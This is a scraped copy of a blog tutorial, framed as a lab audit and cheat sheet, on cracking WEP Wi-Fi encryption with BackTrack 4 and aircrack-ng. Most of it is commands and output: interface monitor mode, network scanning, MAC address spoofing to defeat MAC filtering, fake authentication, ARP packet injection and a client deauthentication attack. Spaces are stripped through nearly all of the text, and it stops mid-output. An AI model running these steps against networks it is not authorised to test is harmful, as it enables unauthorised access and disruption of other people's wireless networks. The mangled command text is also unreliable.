Cracking WEP with Backtrack 4 and aircrackng.docx
《Cracking WEP with Backtrack 4 and aircrackng.docx》由会员分享,可在线阅读,更多相关《Cracking WEP with Backtrack 4 and aircrackng.docx(22页珍藏版)》请在冰点文库上搜索。
CrackingWEPwithBacktrack4andaircrackng
CrackingWEPwithBacktrack4andaircrack-ng
Iknow,thereaprobablyalreadyazillionnumberofwebsitesthatshowhowtocrackWEP.
SoIguessthiswillbewebsitezillion+1learninghowtoaudityourownWEPsecurity.Tobehonest,themainreasonI’mputtingthisinfoonthisblogbecauseIjustwanteditasaquickreference-orcheatsheet,incaseIforgetsomeaboutparticularcommands/parametersagain:
-) Andwhyrelyonotherwebsitesthatmayormaynotbereachablewhenyouneedthem:
-)
Scenario1:
WEPencryption,OPENAuthentication,MACfilteringenabled,activeclientonnetwork
TheAPinmytestlabusesMACfilteringandisconfiguredtouseWEP,usingOPENAuthenticationMethod.
Inthisscenario,Ihave2clientsthatarecurrentlyconnectedtothewirelessnetwork.
Myauditorlaptop(andoldIBMT22)runsbacktrackbeta4,andhasaPCMCIAnetworkcard(Proxim,Atheroschipset)andaDlinkUSBWirelessAdapter(DWL-G122). Bothadapterswillworkjustfine,howeverIgetbetterresultswiththeproximPCMCIAcardbecauseithasarangeextender.
Theprocessofcrackingthewepkeyforthisscenariois
∙Putwirelessinterfaceinmonitormode(airmon-ngstartwireless_interface)
∙Findwirelessnetwork(channel,BSSIDandESSID) (airodump-ngwireless_interface_in_monitor_mode)
∙Findavalid/connectedclient(MACAddress)
∙WaituntilclientisgoneandchangemacaddresstovalidclientMAC (airmon-ngstopwireless_int, ifconfigwireless_intdown,macchanger–mXX:
XX:
XX:
XX:
XX:
XXwireless_int,ifconfigwireless_intup,airmon-ngstartwireless_int)
∙AssociatewithAPandinjectARPpackets(airodump-ng–c–-ivs–w/tmp/filenamewireless_int_in_monitormode,aireplay-ng–fakeauth0–a–h–eESSIDwireless_int_in_monitormode>,aireplay-ng-3-bwireless_int_in_monitor_mode)
∙IfnoARPisfound(andinjected)inareasonableamountoftime,trytodeauthenticateanexistingclient(aireplay-ng–deauth0-aBSSID–cCLientMACwireless_int_in_monitor_mode)
∙SaveIV’stofileandcrackthekey(airocrack-ng–0–bBSSID/tmp/filename.ivs)
Inallcases,inallscenario’s,themostimportantcomponentisverifyingthatyoucanassociatewithanAP.You’lllearnsometechniquesonhowtodothisinthisblog.Butlet’snotjumpahead.
First,listtheadapters:
root@bt:
~#airmon-ng
InterfaceChipsetDriver
wifi0Atherosmadwifi-ng
wlan0Ralink2573USBrt73usb-[phy0]
ath0Atherosmadwifi-ngVAP(parent:
wifi0)
Thewifi0adapteristheproximpcmciacard. wlan0istheDlinkUSBadapter. Forthistest,we’llusetheproximcard(wifi0). Themacaddressofthiscardis00:
20:
A6:
4F:
A9:
41 (youcangetthemacaddressbyrunning‘ifconfigwifi0’)
First,putthecardinmonitormode:
root@bt:
~#airmon-ngstartwifi0
InterfaceChipsetDriver
wifi0Atherosmadwifi-ng
wlan0Ralink2573USBrt73usb-[phy0]
ath0Atherosmadwifi-ngVAP(parent:
wifi0)
ath1Atherosmadwifi-ngVAP(parent:
wifi0)(monitormodeenabled)
Anewinterfacecalled“ath1”hasbeencreated.Thisinterfaceistheonewearegoingtouseinordertofindthewirelessnetworks.Launch“airodump-ngath1”tohopallchannelsandshowthewirelessnetworksthatcanbefound,andtheclients(ifany)thatarecurrentlyassociatedwithanAccessPoint:
root@bt:
~#airodump-ngath1
CH1][Elapsed:
1min][2009-02-1914:
05
BSSIDPWRBeacons#Data,#/sCHMBENCCIPHERAUTHESSID
00:
14:
BF:
89:
9C:
D334104001154.WEPWEPTestNet
BSSIDSTATIONPWRRateLostPacketsProbe
00:
14:
BF:
89:
9C:
D300:
1C:
BF:
90:
5B:
A3550-1012TestNet
00:
14:
BF:
89:
9C:
D300:
19:
5B:
52:
AD:
F7710-132441TestNet
Ok,sowehavefoundanetworkwithESSID“TestNet”,operatingatchannel11.Apparentlythereare2clientsconnectedtothisAP.
Let’sseeifwecanassociatewithAccessPointwithMAC(BSSID)00:
14:
BF:
89:
9C:
D3
First,runairodump-ngagain,butsetittolookatchannel11. ThisisrequiredfortheAPassociation/authentication(viaaireplay-ng)tooperateatchannel11aswell(becauseyoucannotspecifythechanneltousewhenrunningaireplay-ng):
root@bt:
/#airodump-ng--channel11ath1
Leavetheairodump-ngrunningfornowandrunthefollowingaireplay-ngcommandtoperforma‘fakeauthentication’attempt:
root@bt:
~#aireplay-ng--fakeauth0-a00:
14:
BF:
89:
9C:
D3-eTestNetath1
NosourceMAC(-h)specified.UsingthedeviceMAC(00:
20:
A6:
4F:
A9:
41)
14:
14:
50Waitingforbeaconframe(BSSID:
00:
14:
BF:
89:
9C:
D3)onchannel11
14:
14:
50SendingAuthenticationRequest(OpenSystem)[ACK]
14:
14:
50APrejectsthesourceMACaddress(00:
20:
A6:
4F:
A9:
41)?
Authenticationfailed(code1)
14:
14:
53SendingAuthenticationRequest(OpenSystem)[ACK]
14:
14:
53APrejectsthesourceMACaddress(00:
20:
A6:
4F:
A9:
41)?
Authenticationfailed(code1)
Ok–Authenticationfailed,sotheAPdoesMACfiltering.WecouldtrytousetheMACaddressofoneoftheclientsthatarealreadyconnected(byspecifyingitsMACaddressusingthe–hparameter),butwe’llchangetheMACaddressonourinterface(whichwillmakeallfuturecommandsshorter)
First,killtheairodump-ngprocess. Takewifi0(ath1)outofmonitoringmode:
root@bt:
~#airmon-ngstopath1
InterfaceChipsetDriver
wifi0Atherosmadwifi-ng
wlan0Ralink2573USBrt73usb-[phy0]
ath0Atherosmadwifi-ngVAP(parent:
wifi0)
ath1Atherosmadwifi-ngVAP(parent:
wifi0)(VAPdestroyed)
root@bt:
~#airmon-ng
InterfaceChipsetDriver
wifi0Atherosmadwifi-ng
wlan0Ralink2573USBrt73usb-[phy0]
ath0Atherosmadwifi-ngVAP(parent:
wifi0)
Bringwifi0down,changethemacaddressofwifi0,bringwifi0upagainandthenputtheinterfacebackinmonitormode:
root@bt:
~#ifconfigwifi0down
root@bt:
~#macchanger-m00:
1C:
BF:
90:
5B:
A3wifi0
CurrentMAC:
00:
20:
a6:
4f:
a9:
44(Proxim,Inc.)
FakedMAC:
00:
1c:
bf:
90:
5b:
a3(unknown)
root@bt:
~#ifconfigwifi0up
root@bt:
~#airmon-ngstartwifi0
InterfaceChipsetDriver
wifi0Atherosmadwifi-ng
wlan0Ralink2573USBrt73usb-[phy0]
ath0Atherosmadwifi-ngVAP(parent:
wifi0)
ath1Atherosmadwifi-ngVAP(parent:
wifi0)(monitormodeenabled)
root@bt:
~#ifconfigath1
ath1Linkencap:
UNSPECHWaddr00-1C-BF-90-5B-A3-D0-03-00-00-00-00-00-00-00-00
UPBROADCASTRUNNINGMULTICASTMTU:
1500Metric:
1
RXpackets:
106errors:
0dropped:
0overruns:
0frame:
0
TXpackets:
0errors:
0dropped:
0overruns:
0carrier:
0
collisions:
0txqueuelen:
0
RXbytes:
9448(9.4KB)TXbytes:
0(0.0B)
Ok,looksgood
Let’sseeifitmakesadifference. Runairodump-ngagain(airodump-ng–c11ath1)andthentrytoperformthefakeauthenticationagain
root@bt:
/#aireplay-ng--fakeauth0-a00:
14:
BF:
89:
9C:
D3-eTestNetath1
NosourceMAC(-h)specified.UsingthedeviceMAC(00:
1C:
BF:
90:
5B:
A3)
14:
20:
19Waitingforbeaconframe(BSSID:
00:
14:
BF:
89:
9C:
D3)onchannel11
14:
20:
19SendingAuthenticationRequest(OpenSystem)[ACK]
14:
20:
19Authenticationsuccessful
14:
20:
19SendingAssociationRequest[ACK]
14:
20:
19Associationsuccessful:
-)(AID:
1)
IfyouareconnectingtoanAPthatisabitpicky,thenyouhavesomeoptionstotweaktheaireplay-ngbehaviour:
aireplay-ng-16000-o1-q12-eTestNet-a00:
14:
BF:
89:
9C:
D3ath1
–16000=reauthenticateevery6000seconds
-o1=onlysendonesetofpacketsatatime
-q12=sendkeepalivepacketsevery12seconds (sometimes,itworksbetterwithoutthislastparameter)
Fromthispointforward,youshouldbeabletoassociatewiththeAP.Ifnot,there’snouseincontinuingwiththeprocess.
Ok,nowlet’strytocrackthekey.First,stoptheexistingairodumpprocessandrunairodump-ngwiththeoptiontosavetheiv’stoafile(parameter–i or –ivs):
root@bt:
~#airodump-ng-c11-w/tmp/TestNetAudit1-iath1
CH11][Elapsed:
12s][2009-02-1914:
24
BSSIDPWRRXQBeacons#Data,#/sCHMBENCCIPHERAUTHESSID
00:
14:
BF:
89:
9C:
D334100135001154.WEPWEPOPNTestNet
BSSIDSTATIONPWRRateLostPacketsProbe
00:
14:
BF:
89:
9C:
D300:
19:
5B:
52:
AD:
F7430-11084TestNet
Thenumberof#Datapacketsismostlikelystillverylowanddoesnotgoupasfastaswewantitto.SoweneedtograbanARPpacketandinjectit.
First,launchaireplay-ngininjectionmode:
root@bt:
~#aireplay-ng-3-b00:
14:
BF:
89:
9C:
D3ath1
Forinformation,noactionrequired:
Usinggettimeofday()insteadof/dev/rtc
NosourceMAC(-h)specified.UsingthedeviceMAC(00:
1C:
BF:
90:
5B:
A3)
14:
26:
55Waitingforbeaconframe(BSSID:
00:
14:
BF:
89:
9C:
D3)onchannel11
SavingARPrequestsinreplay_arp-0219-142655.cap
Youshouldalsostartairodump-ngtocapturereplies.
Read243packets(got0ARPrequestsand0ACKs),sent0packets...(0pps)
(leavethisrunning–waituntilanARPrequestisseen.ThetoolwillthenautomaticallyattempttoinjecttheARPpackets,thusincreasingthenumberofdatapackets(andiv’s)onthenetwork).SomeAP’srequireyoutobeassociated(orwillperformdisassociateafterawhile).ItmighttakeacoupleofminutesbeforeanARPisseen.Ifyoudon’thavealotoftime,itmighthelptryingtoassociateyourselfagain:
aireplay-ng--fakeauth0-a00:
14:
BF:
89:
9C:
D3-eTestNetath1
IfthatdoesnotgeneratetherequiredARPpacket(s),whichshouldsetofftheARPinjection,thentrytodeauthenticatetheexistingclients.(whichmaynotworkverywelliftheAPhasMACfilteringenabled.IfyouhaveasecondclientMACaddress,youcansetyourownMACaddresstooneoftheclientsandtrytodeauththeotherclient…)
Keeptheaireplay-ngandairodump-ngrunningandrunthedeauthattack.
root@bt:
/#aireplay-ng--deauth0-a00:
14:
BF:
89:
9C:
D3ath1
14:
38:
15Waitingforbeaconframe(BSSID:
00:
14:
BF:
89:
9C:
D3)onchannel11
NB:
thisattackismoreeffectivewhentargeting
aconnectedwirelessclient(-c).
14:
38:
15Sending